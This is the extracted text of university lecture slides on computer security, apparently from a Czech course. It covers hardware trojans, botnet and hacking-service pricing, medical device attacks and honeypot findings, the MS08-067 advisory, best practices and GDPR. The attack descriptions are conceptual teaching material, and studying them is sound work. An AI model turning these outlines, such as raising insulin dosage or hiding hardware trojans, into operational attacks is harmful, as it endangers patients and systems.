I ...but is implemented within BIOS (SPI flash memory)J. Rutkowska, Intel x86 considered harmful, Oct. 2015

M. Burša Security

ÚvodModely


Záver







M. Burša Security

ÚvodModely


Záver


HW Attacks: (Pre)fabrication Attacks

Obrázek: IC design: threat vectors (red), 3rd party in control (blue)M. Burša Security

ÚvodModely


Záver



Threat model:I Dopant-level Trojans: Short-circuit of victim transistors (!no

added/removed gates/wires), hard to detect duringphysical inspection, better detected by post-fabricationfunctional testing

I Inserted malicious circuitry; protection:I side channel (anomaly detection)I add sensors (propagation delay, ...)

I Yang, Hicks: Single gate prefabrication attack...I ...triggered by specific sequence of instructions (fast

toggling of one signal)→ need to be stealth so it is notdiscoverable by common tests/benchmarks

K. Yang, M. Hicks et al. A2: Analog Malicious Hardware, 2016

M. Burša Security

ÚvodModely


Záver






I Yang, Hicks: Single gate prefabrication attack...

I ...triggered by specific sequence of instructions (fasttoggling of one signal)→ need to be stealth so it is notdiscoverable by common tests/benchmarks


M. Burša Security

ÚvodModely


Záver






I Yang, Hicks: Single gate prefabrication attack...I ...triggered by specific sequence of instructions (fast

toggling of one signal)→ need to be stealth so it is notdiscoverable by common tests/benchmarks


M. Burša Security

ÚvodModely


Záver



Obrázek: Charge pump


M. Burša Security

ÚvodModely


Záver



Obrázek: Attack triggering


M. Burša Security

ÚvodModely


Záver


Botnet pricing, Feb 2013

Mix/No. bots 1000 5000 10 000World mix 25 USD 110 USD 200 USDEuropean mix 50 USD 225 USD 400 USDGermany, Canada, GB 80 USD 350 USD 600 USDUS 120 USD 550 USD 1000 USD

http://blog.webroot.com/2013/02/28/how-much-does-it-cost-to-buy-10000-u-s-based-malware-infected-hosts/

M. Burša Security

ÚvodModely


Záver


Attack pricing, Nov, 2012

Botnet/hr 2 USDBotnet (2000) 185 USDSpying SMS (trojan) 350 USDSMS Spam (1 milion addresses) 10 USDHack Gmail account 150 USDHack Twitter account 120 USDHack Facebook account 120 USDDDoS attack 28 – 65 USDCorporate e-mail attack 500 USD

http://www.gizmodo.co.uk/2012/11/how-much-does-it-cost-to-hire-a-botnet-or-hack-a-facebook-account/

M. Burša Security

ÚvodModely


Záver


Get a better price with good marketing...


M. Burša Security

ÚvodModely


Záver



I Evil maid attack, cold boot attackI Scareware, Rogueware, Malware, Adware, Phishing

attacks, ...I BotnetsI MITM attacks, SSL StrippingI ATM Skimming (?video), Credit Card frauds

M. Burša Security

ÚvodModely


Záver


Phishing fraud form

Obrázek: Nechejte si overit svou kartu ;)

M. Burša Security

ÚvodModely


Záver



I Iot→ IoST, IoUT

M. Burša Security

ÚvodModely


Záver


GAO14 to FDA15

GAOMEDICAL DEVICESFDA Should Expand Its Consideration of Information Securityfor Certain Types of DevicesAugust, 2012

14US Government Accounting Office15US Food and Drug Administration

M. Burša Security

ÚvodModely


Záver


GAO16 to FDA17

Threats for active (powered) devices:I Unintentional

I Defective SW and FWI EMG interference

I IntentionalI Unauthorized access (altering signals)I MalwareI DOS attack (battery depletion)

http://www.gao.gov/assets/650/647767.pdf

16US Government Accounting Office17US Food and Drug Administration

M. Burša Security

ÚvodModely


Záver


Vulnerable Cardiac device

Target: Implantable cardiac devices and pacemakers [2008]I turning offI issue life-threatening el. shocks

Obrázek: Pacemaker [SCOTT CAMAZINE / GETTY IMAGES]http://healthland.time.com/2012/10/22/wireless-medical-devices-vulnerable-to-hacking/

M. Burša Security

ÚvodModely


Záver


Vulnerable insulin pump

Target: Insulin pump [2011]I scan for serial no.I increase insulin dosageI disable warning mechanism

Obrázek: Insulin pumphttp://www.theregister.co.uk/2011/10/27/fatal_insulin_pump_attack

M. Burša Security

ÚvodModely


Záver


GAO: Key control areas

I SW testing, verification and validationI Risk assessmentsI Risk managementI Access controlI Vulnerability and patch managementI Technical audit and accountabilityI Security-incident responseI Contingency planning

M. Burša Security

ÚvodModely


Záver


GAO: Key vulnerabilities

I Limited battery capacityI Remote accessI Unencrypted data transferI Untested SW and FWI Susceptibility to (EMG) interferenceI Limited (nonexistent) authentication process and

authorization proceduresI Disabling of warning mechanismI Design based on older technologiesI Inability to update or install security patches

M. Burša Security

ÚvodModely


Záver


GAO: Key information security risks

I Unauthorized change of device settingsI Unauthorized change to or disabling of therapiesI Loss or disclosure of sensitive dataI Device malfunction

M. Burša Security

ÚvodModely


Záver


FDA: Efforts

I Postmarket effortsI MAUDE (adverse event reporting system)I Postmarket studies conducted by manufacturersI Manufacturers have to prepare annual reports

M. Burša Security

ÚvodModely


Záver


S. Erven, M. Collao: Medical Devices: Pwnage andHoneypots

S. Erven, M. CollaoMedical devices:Pwnage and Honeypotshttps://youtu.be/qX_dV6LUTdoSeptember, 2015

M. Burša Security

https://youtu.be/qX_dV6LUTdo

ÚvodModely


Záver



Phase 1 Research: Device vulnerabilities Problem: Mostly XPI Weak default/hardcoded administrative credentials

I Treatment modificationI Cannot attribute action to individual

I Known SW vulnerabilities in existing and new devicesI Reliability and stability issuesI Increased deployment cost to preserve patient safety

I Unencrypted data transmission and service authorizationflaws

I Healthcare record privacy and integrityI Treatment modification

M. Burša Security

ÚvodModely


Záver


Erven et al.: Medical Devices: Pwnage and Honeypots

Phase 2 Research: Network discovery Problem:Misconfiguration in network

I Open SMB serverI Leaking network information (not only med.)I Found hundreds of exposed 3rd party healthcare devices:

Anesthesia: 21, Cardiology: 488, Infusion: 133, MRI: 97,PACS: 323, Nuclear med: 67, Pacemaker: 31

I These have used credentials...

I ...however quite poorI Knowning IP/Username/Office_no: Physical attack

feasible: Data extrusion, phising (Win XP), unlimitedattempts for pwd

I Win XP: MS08-67 vulnerability

M. Burša Security

ÚvodModely


Záver



Phase 2 Research: Network discovery Problem:Misconfiguration in network

I Open SMB serverI Leaking network information (not only med.)I Found hundreds of exposed 3rd party healthcare devices:

Anesthesia: 21, Cardiology: 488, Infusion: 133, MRI: 97,PACS: 323, Nuclear med: 67, Pacemaker: 31

I These have used credentials...I ...however quite poor

I Knowning IP/Username/Office_no: Physical attackfeasible: Data extrusion, phising (Win XP), unlimitedattempts for pwd

I Win XP: MS08-67 vulnerabilityM. Burša Security

ÚvodModely


Záver


Microsoft Security Bulletin MS08-067 – Critical

Vulnerability in Server Service Could Allow Remote CodeExecution (958644)Published: October 23, 2008, Version: 1.0

This security update resolves a privately reported vulnerability in theServer service. The vulnerability could allow remote code execution ifan affected system received a specially crafted RPC request. OnMicrosoft Windows 2000, Windows XP, and Windows Server 2003systems, an attacker could exploit this vulnerability withoutauthentication to run arbitrary code. It is possible that this vulnerabilitycould be used in the crafting of a wormable exploit. Firewall bestpractices and standard default firewall configurations can help protectnetwork resources from attacks that originate outside the enterpriseperimeter.

I CVE-2008-4250

M. Burša Security

ÚvodModely


Záver


Vulnerability Summary for CVE-2008-4250

Original release date: 10/23/2008, Last revised: 10/30/2012, Source: US-CERT/NIST

Overview The Server service in Microsoft Windows 2000 SP4, XPSP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1,Server 2008, and 7 Pre-Beta allows remote attackers to executearbitrary code via a crafted RPC request that triggers the overflowduring path canonicalization, as exploited in the wild by Gimmiv.A inOctober 2008, aka "Server Service Vulnerability."

Impact

CVSS v2 Base Score 10.0 HIGHImpact Subscore 10.0Exploitability Subscore 10.0Access Vector Network exploitableAccess Complexity LowAuthentication Not required to exploit

Impact Type: Provides administrator access, Allows complete confidentiality, integrity, and availability violation;Allows unauthorized disclosure of information; Allows disruption of service

M. Burša Security

ÚvodModely


Záver



Phase 3 Research: Admin access Problem: default/hardcodedcredentials

I GE quickly responded...

I ...(after research) that creds are not harcoded, but defaultonly...

I ...however about 30 CVEs18 up to 2006 proved themwrong: Nuclear img, CT, Cardiology, Archiving, Analytics,Audit, PACS, X-ray...

I about 2014 started to use SSL (encryption)

18Common Vulnerabilities and ExposuresM. Burša Security

ÚvodModely


Záver




I GE quickly responded...I ...(after research) that creds are not harcoded, but default

only...

I ...however about 30 CVEs18 up to 2006 proved themwrong: Nuclear img, CT, Cardiology, Archiving, Analytics,Audit, PACS, X-ray...

I about 2014 started to use SSL (encryption)

18Common Vulnerabilities and ExposuresM. Burša Security

ÚvodModely


Záver




I GE quickly responded...I ...(after research) that creds are not harcoded, but default

only...I ...however about 30 CVEs18 up to 2006 proved them

wrong: Nuclear img, CT, Cardiology, Archiving, Analytics,Audit, PACS, X-ray...

I about 2014 started to use SSL (encryption)18Common Vulnerabilities and Exposures

M. Burša Security

ÚvodModely


Záver



Phase 3 Research: Admin access

Obrázek: Zdroj: slideshare: medical-devices-passwords-to-pwnage

M. Burša Security

ÚvodModely


Záver



Obrázek: Effective password policy

M. Burša Security

ÚvodModely


Záver



Phase 3 Research: Admin access Problems:I Documentation: in some cases: do not change, pwd resset

not allowedI Documentation: Do not change pwd or we won’t support

you.I Documentation not updated about how to change default

creds. Secure config guides lacking.I Support personal often rely on implementation doc – these

logins are heavily utilized...

M. Burša Security

ÚvodModely


Záver



Phase 4 Research: HoneypottingI Mimic medical device external presence: Services,

connections strings, web frontendsI Replicate existing vulnerabilities: OS (MS08-067), App

level (Telnet RCE, VNC), Default creds (SSH, Web)I Results with 10 honeypots

I Successfull logins: 55.416I Succ exploits: 24I Dropped malware samples: 209I Top 3 src countries: Netherlands, China, KoreaI HoneyCreds login: 8

I Problem: usually talks to CC serverOutcome: Devices compromised by unintended attacs

M. Burša Security

ÚvodModely


Záver



ConclusionI Medical devices are increasingly accessible due to the

nature of healthcareI HIPAA19 focuses on patient privacy, not patient safetyI FDA does not validate cyber safety controlsI Malicious intent is not a prerequisite for adverse patient

outcomes

I Scan your biomedical environment for default credentialsI Report identified issues to manufacturer for remediation

Summary of current state:

19Health Insurance Portability and Accountability ActM. Burša Security

ÚvodModely


Záver



ConclusionI Medical devices are increasingly accessible due to the

nature of healthcareI HIPAA19 focuses on patient privacy, not patient safetyI FDA does not validate cyber safety controlsI Malicious intent is not a prerequisite for adverse patient

outcomes

I Scan your biomedical environment for default credentialsI Report identified issues to manufacturer for remediation

Summary of current state:19Health Insurance Portability and Accountability Act

M. Burša Security

ÚvodModely


Záver



Current state summaryI FDA recieves several hundred thousand reports of patient

safety issues per yearI Cyber safety investigations hamped by evidence capture

capabilitiesI New devices are coming to market with long-known defectsI Existing devices are not consistently maintained and

updated

Recommended treatment summaryI Patient safety as the overriding objectiveI Avoid filed practices and iteratively evolve better onesI Engage internal and external stakeholdersI Safety into existing practices and governance

M. Burša Security

ÚvodModely


Záver



Current state summaryI FDA recieves several hundred thousand reports of patient

safety issues per yearI Cyber safety investigations hamped by evidence capture

capabilitiesI New devices are coming to market with long-known defectsI Existing devices are not consistently maintained and

updatedRecommended treatment summary

I Patient safety as the overriding objectiveI Avoid filed practices and iteratively evolve better onesI Engage internal and external stakeholdersI Safety into existing practices and governance

M. Burša Security

ÚvodModely


Záver


2016 Marin, Singelee, et al.

On the (in)security of the latest generation implantable cardiacdefibrillators and how to secure them

I Weak adversary, cheap setupI Devices: Short- and long-range communication channelsI Able to fully reverse-engineer the protocolsI Vulnerabilities:

I Privacy attacks (only LFSR20 obfuscation)I DoS attacks (remained in standby for 5 min, instead of

going to sleep). Can be activated via long-range commchannel.

I Spoofing and replay attacks.No integrity nor authenticity checks of the msg.

20Linear Feedbak Shift RegisterM. Burša Security

ÚvodModely


Záver


2016 Marin, Singelee, et al.

On the (in)security of the latest generation implantable cardiacdefibrillators and how to secure them

I Countermeasures:I Jamming the wireless channel.I Adding a ’shutdown’ command (dev goes to sleep mode

directly)I Key agreement protocol (master key in HW; might be a

risk(!) if revealed). Authors propose semi-offline protocol(devs must be ensured to operate even in offlineenvironment)

I Diferentiate between device programmers and basestations

M. Burša Security

ÚvodModely


Záver

Prehled technologiíZásadyPrevenceTesty

Secure systems

I Automated theorem proving (matematické dukazy)I Jednoduché mikrokernelyI Modulární mikrokernely (chyba ovlivní pouze príslušný

modul, Hurd)I KryptografieI Kryptografické procesoryI Silné metody autentizace (systému)I Chain of trustI Mandatory access controll (odstranení uživatele ukoncí

všechny jeho procesy)I Capability and Acces Control List

M. Burša Security

ÚvodModely


Záver


Secure systems

I Nepoužívat aplikace se známými chybami (0-day attack,worms)

I ZálohováníI Antivirový softwareI FirewallI Systém overování identity (hesla, cipové karty, biometrie,

. . . )I Šifrování (PKI)I IDS (pasívní n. reaktivní)

I network, user-, app-, host-, app. protocol-based, IPS,Artificial immune system

I Informovanost uživatelu o social engineering

M. Burša Security

ÚvodModely


Záver


Always back up!


M. Burša Security

ÚvodModely


Záver


Best practices for bussiness, ISTR Symantec 2014

1. Employ defense-in-depth strategies2. Monitor for network incursion attempts, vulnerabilities, and

brand abuse3. Antivirus on endpoints is not enough4. Secure your websites against MITM attacks and malware

infection5. Protect your private keys6. Use encryption to protect sensitive data7. Ensure all devices allowed on company networks have

adequate security protections

M. Burša Security

ÚvodModely


Záver


Best practices for bussiness, ISTR Symantec 2014

8. Implement a removable media policy9. Be aggressive in your updating and patching

10. Enforce an effective password policy11. Ensure regular backups are available12. Restrict email attachments13. Ensure that you have infection and incident response

procedures in place14. Educate users on basic security protocols

M. Burša Security

ÚvodModely


Záver


Best practices for consumers, ISTR Symantec 2014

1. Protect yourself2. Update regularly3. Be wary of scareware tactics4. Use an effective password policy5. Think before you click6. Guard your personal data

M. Burša Security

ÚvodModely


Záver


Top ten for for bussiness, Ken Hess, 2013

1. Encrypt your data

2. Use digital certificates

3. Implement DLP21 and auditing

4. Implement a removable media policy

5. Secure websites against MITM and malware infections

6. Use a spam filter on email servers

7. Use a comprehensive endpoint security solution

8. Network-based security hardware and software

9. Maintain security patches

10. Educate your users

http://www.zdnet.com/10-security-best-practice-guidelines-for-businesses-7000012088/21

Data Loss Prevention

M. Burša Security

ÚvodModely


Záver


Secure your systems!

Obrázek: Zdroj:http://i.iinfo.cz/images/263/maximum-securitz-entrance-1-prev.jpg

M. Burša Security

ÚvodModely


Záver


Top ten for for consumers, Ken Hess, 2013

1. Always use antivirus software on your personal devices

2. Always use a device firewall

3. Keep your operating systems and software up to date

4. Never download pirated or cracked software

5. Don´t click on popup windows that tell you that your computer is infected with avirus

6. Be careful with email attachments

7. Don´t use public wi-fi hotspots without using a VPN (secure) connection

8. Use passwords on everything and be sure that they´re strong passwords

9. Beware of what kind of information you share on social media sites

10. Review your online accounts and credit report

http://www.zdnet.com/10-security-best-practice-guidelines-for-consumers-7000012171/

M. Burša Security

ÚvodModely


Záver


Be informed!

Obrázek: Zdroj: pinterest.com/itpie/it-jokes/M. Burša Security

ÚvodModely


Záver


Secure systems

Information leakage detection and protectionI Data Loss PreventionI Information Leak PreventionI Content Monitoring and FilteringI Extrusion Prevention System

M. Burša Security

ÚvodModely


Záver


Attack tree

Analýza útoku

Obrázek: Attack treeM. Burša Security

ÚvodModely


Záver


Hacked PC

Obrázek: Zdroj: washington_post.com

M. Burša Security

ÚvodModely


Záver


Kentucky Fraud

Obrázek: Kentucky Fraud

M. Burša Security

ÚvodModely


Záver


Kentucky Fraud

Obrázek: Zeus, Checkpoint Security Report 2016

M. Burša Security

ÚvodModely


Záver


Kryptografie

I Symetrická šifra: DES, AES, Blowfish, RC4, 3DESI Asymetrická šifra: DH, RSA, ElGamal, ECI Šifrovací klíc

I Nutno zvážit sílu a délku klíceI Nutno zvážit možnost prolomení (MD5, SHA1)

M. Burša Security

ÚvodModely


Záver


MD5 collision

https://shells.aachen.ccc.de/~spq/md5.gif

M. Burša Security

https://shells.aachen.ccc.de/~spq/md5.gif

ÚvodModely


Záver


MD5 collision

How it works...The trick is to generate it one digit at a time. You generatecollision blocks after each frame so that you can swap out thedigits when you know the hash without altering the hash.

1. Generate a gif for each possible digit in the first column2. Append collision blocks to each gif to make a 16 way

collision3. Repeat for each digit4. Hash the final product5. Replace each digit with the correct digit

M. Burša Security

ÚvodModely


Záver


NX bit

I NX bit: HW záležitost, Lze i SW – overheadI Windows – od WXP SP2 (DEP – Data execution

prevention)I Také ASLR, Code signingI Vetšinou neúcinné proti ROP22

22Return Oriented ProgrammingM. Burša Security

ÚvodModely


Záver


Testy pruniku

I Simulace útokuI Pozor na právní aspektyI Black box, white box, gray box testing

I Bezpecnostní audityI problém: auditor muže získat prístup k citlivým informacímI etické hledisko: muže taková firma zamestnat bývalého

hackera?

M. Burša Security

ÚvodModely


Záver

Z domovaObecnéDiskuze

ZKB

I 181/2014 Sb., úcinnost od 1. 1. 2015, prechodné obdobíI výhoda: ±dle ISO27000 (ISO27k)23

I kritická informacní infrastruktura, významný informacnísystém, významná sít’ el. komunikací

I v príprave provádecí vyhláška: stanovuje významné ISI CERT/CSIRT (Computer Emergency Response

Team/Computer Security Incident Response Team), NBÚ24

23http://en.wikipedia.org/wiki/ISO/IEC_27000-series

24Další info: http://www.root.cz/clanky/cert-csirt-tymy-a-jejich-role/

M. Burša Security

ÚvodModely


Záver


ZKB



I v príprave provádecí vyhláška: stanovuje významné IS

I CERT/CSIRT (Computer Emergency ResponseTeam/Computer Security Incident Response Team), NBÚ24



M. Burša Security

ÚvodModely


Záver


ZKB



I v príprave provádecí vyhláška: stanovuje významné ISI CERT/CSIRT (Computer Emergency Response

Team/Computer Security Incident Response Team), NBÚ24



M. Burša Security

ÚvodModely


Záver


GDPR

I General Data Protection Regulation (EU 2016/679)I (similar to UK Data Protectiono Act 1998 (DPA))

The regulation was adopted on 27 April 2016. It enters intoapplication 25 May 2018 after a two-year transition period and,unlike a directive, it does not require any enabling legislation tobe passed by national governments.

M. Burša Security

ÚvodModely


Záver


GDPR

I Controller: How an dwhy personal data is processedI Processor: Acts on controller’s behalfI Personal data: Anything that might (even indirectly lead to

identifying a person, i.e.: Cookies, IP addressesI Applies to both automated and manually filled personal

data.I Personal data that are pseudonymized (e.g. key-coded)

can fall within the scopeI AccountabilityI Breach notification: To supervisory auth. within 72 hrsI Data portabilityI Data Protection OfficerI Citizens now have the right to question and fight decisions

that affect them that have been made on a purelyalgorithmic basis.

M. Burša Security

ÚvodModely


Záver


GDPR

Individual’s rightsI The right to be informedI The right of accessI The right to rectificationI The right to erasureI The right to restrict processingI The right to data portabilityI The right to object

M. Burša Security

ÚvodModely


Záver


Bezpecnost

Není stav systému, je to proces:Vyvíjejí se nejen obrany, ale i hrozby. . .

Obrázek: Access Control

M. Burša Security

ÚvodModely


Záver


Always be prepared


M. Burša Security

ÚvodModely


Záver


Dotazy

Informace pro predmet 33LI

I Password salting: Nutné implementovat v semestrálnípráci.

I Info o zkoušce: Témata z této prednášky se objeví ve zk.testu.

Dekuji za pozornost...

M. Burša Security

ÚvodModely


Záver


Checkpoint security report 2013

Our research shows that 75 % of hosts in organizations werenot using the latest software versions (e.g. Acrobat Reader,Flash Player, Internet Explorer, Java Runtime Environment,etc). This means that these hosts were exposed to a wide rangeof vulnerabilities that could have been exploited by hackers.Our research also shows that 44 % of hosts in organizationswere not running the latest Microsoft Windows Service Packs.Service packs usually include security updates for the operatingsystem. Not running the latest versions increases security risk.http://www.checkpoint.com/campaigns/security-report/

M. Burša Security

http://www.checkpoint.com/campaigns/security-report/

http://www.checkpoint.com/campaigns/security-report/

ÚvodModely


Záver


Checkpoint security report 2013

M. Burša Security

security in computer systems - cvut.cz · security in computer systems miroslav burša1 1beat...

Documents